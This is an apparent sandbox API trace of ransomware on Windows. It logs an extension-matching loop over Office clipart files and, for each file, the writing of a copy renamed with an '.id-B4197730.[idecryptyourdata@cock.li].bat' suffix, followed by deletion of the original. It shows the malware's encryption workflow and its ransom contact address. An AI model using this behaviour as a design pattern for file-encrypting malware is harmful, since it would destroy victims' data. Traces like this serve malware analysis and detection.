[0070.207] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.207] lstrlenW (lpString=".1cd") returned 4 [0070.207] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.207] lstrlenW (lpString=".jpg") returned 4 [0070.207] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.495] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.495] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.496] GetLastError () returned 0x0 [0070.496] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.535] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.537] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.537] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.537] SetEndOfFile (hFile=0x380) returned 1 [0070.537] CloseHandle (hObject=0x380) returned 1 [0070.537] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.538] SetEndOfFile (hFile=0x370) returned 1 [0070.539] CloseHandle (hObject=0x370) returned 1 [0070.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.539] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp")) returned 1 [0070.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.540] lstrlenW (lpString=".doc") returned 4 [0070.540] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".docx") returned 5 [0070.540] lstrcmpiW (lpString1=".docx", lpString2="0.BMP") returned -1 [0070.540] lstrlenW (lpString=".pdf") returned 4 [0070.540] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".xls") returned 4 [0070.540] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".xlsx") returned 5 [0070.540] lstrcmpiW (lpString1=".xlsx", lpString2="0.BMP") returned -1 [0070.540] lstrlenW (lpString=".ppt") returned 4 [0070.540] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.540] lstrlenW (lpString=".zip") returned 4 [0070.540] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".rar") returned 4 [0070.540] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".bz2") returned 4 [0070.540] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.540] lstrlenW (lpString=".7z") returned 3 [0070.540] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.540] lstrlenW (lpString=".dbf") returned 4 [0070.540] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.541] lstrlenW (lpString=".1cd") returned 4 [0070.541] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 68 [0070.541] lstrlenW (lpString=".jpg") returned 4 [0070.541] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.542] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.542] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.543] GetLastError () returned 0x0 [0070.543] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.546] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.548] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.548] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.548] SetEndOfFile (hFile=0x380) returned 1 [0070.548] CloseHandle (hObject=0x380) returned 1 [0070.548] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.548] SetEndOfFile (hFile=0x370) returned 1 [0070.549] CloseHandle (hObject=0x370) returned 1 [0070.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp")) returned 1 [0070.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.550] lstrlenW (lpString=".doc") returned 4 [0070.550] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".docx") returned 5 [0070.550] lstrcmpiW (lpString1=".docx", lpString2="5.BMP") returned -1 [0070.550] lstrlenW (lpString=".pdf") returned 4 [0070.550] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".xls") returned 4 [0070.550] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".xlsx") returned 5 [0070.550] lstrcmpiW (lpString1=".xlsx", lpString2="5.BMP") returned -1 [0070.550] lstrlenW (lpString=".ppt") returned 4 [0070.550] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.550] lstrlenW (lpString=".zip") returned 4 [0070.550] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".rar") returned 4 [0070.550] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".bz2") returned 4 [0070.550] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.550] lstrlenW (lpString=".7z") returned 3 [0070.551] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.551] lstrlenW (lpString=".dbf") returned 4 [0070.551] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.551] lstrlenW (lpString=".1cd") returned 4 [0070.551] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 68 [0070.551] lstrlenW (lpString=".jpg") returned 4 [0070.551] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.551] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.551] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.552] GetLastError () returned 0x0 [0070.552] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.554] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.555] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.555] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.555] SetEndOfFile (hFile=0x380) returned 1 [0070.555] CloseHandle (hObject=0x380) returned 1 [0070.555] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.555] SetEndOfFile (hFile=0x370) returned 1 [0070.556] CloseHandle (hObject=0x370) returned 1 [0070.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.556] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp")) returned 1 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString=".doc") returned 4 [0070.557] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".docx") returned 5 [0070.557] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1 [0070.557] lstrlenW (lpString=".pdf") returned 4 [0070.557] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".xls") returned 4 [0070.557] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".xlsx") returned 5 [0070.557] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1 [0070.557] lstrlenW (lpString=".ppt") returned 4 [0070.557] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString=".zip") returned 4 [0070.557] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".rar") returned 4 [0070.557] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".bz2") returned 4 [0070.557] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString=".7z") returned 3 [0070.557] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString=".dbf") returned 4 [0070.557] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString=".1cd") returned 4 [0070.557] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 68 [0070.557] lstrlenW (lpString=".jpg") returned 4 [0070.557] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.558] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.558] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.558] GetLastError () returned 0x0 [0070.558] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7f68, lpOverlapped=0x0) returned 1 [0070.568] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7f70, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7f70, lpOverlapped=0x0) returned 1 [0070.569] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.569] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.569] SetEndOfFile (hFile=0x380) returned 1 [0070.569] CloseHandle (hObject=0x380) returned 1 [0070.569] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.569] SetEndOfFile (hFile=0x370) returned 1 [0070.570] CloseHandle (hObject=0x370) returned 1 [0070.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp")) returned 1 [0070.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.571] lstrlenW (lpString=".doc") returned 4 [0070.571] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.571] lstrlenW (lpString=".docx") returned 5 [0070.571] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1 [0070.571] lstrlenW (lpString=".pdf") returned 4 [0070.571] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.571] lstrlenW (lpString=".xls") returned 4 [0070.571] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.571] lstrlenW (lpString=".xlsx") returned 5 [0070.571] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1 [0070.571] lstrlenW (lpString=".ppt") returned 4 [0070.571] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.571] lstrlenW (lpString=".zip") returned 4 [0070.571] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.571] lstrlenW (lpString=".rar") returned 4 [0070.572] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.572] lstrlenW (lpString=".bz2") returned 4 [0070.572] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.572] lstrlenW (lpString=".7z") returned 3 [0070.572] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.572] lstrlenW (lpString=".dbf") returned 4 [0070.572] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.572] lstrlenW (lpString=".1cd") returned 4 [0070.572] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 68 [0070.572] lstrlenW (lpString=".jpg") returned 4 [0070.572] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.574] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.574] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.575] GetLastError () returned 0x0 [0070.575] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3e74, lpOverlapped=0x0) returned 1 [0070.577] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3e80, lpOverlapped=0x0) returned 1 [0070.578] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.578] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.578] SetEndOfFile (hFile=0x380) returned 1 [0070.578] CloseHandle (hObject=0x380) returned 1 [0070.578] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.578] SetEndOfFile (hFile=0x370) returned 1 [0070.579] CloseHandle (hObject=0x370) returned 1 [0070.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf")) returned 1 [0070.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.580] lstrlenW (lpString=".doc") returned 4 [0070.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString=".docx") returned 5 [0070.580] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.580] lstrlenW (lpString=".pdf") returned 4 [0070.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString=".xls") returned 4 [0070.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.580] lstrlenW (lpString=".xlsx") returned 5 [0070.580] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.580] lstrlenW (lpString=".ppt") returned 4 [0070.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.580] lstrlenW (lpString=".zip") returned 4 [0070.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.580] lstrlenW (lpString=".rar") returned 4 [0070.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString=".bz2") returned 4 [0070.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString=".7z") returned 3 [0070.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.580] lstrlenW (lpString=".dbf") returned 4 [0070.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.581] lstrlenW (lpString=".1cd") returned 4 [0070.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 68 [0070.581] lstrlenW (lpString=".jpg") returned 4 [0070.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.581] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.581] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.581] GetLastError () returned 0x0 [0070.581] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x6978, lpOverlapped=0x0) returned 1 [0070.817] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x6980, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x6980, lpOverlapped=0x0) returned 1 [0071.181] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, 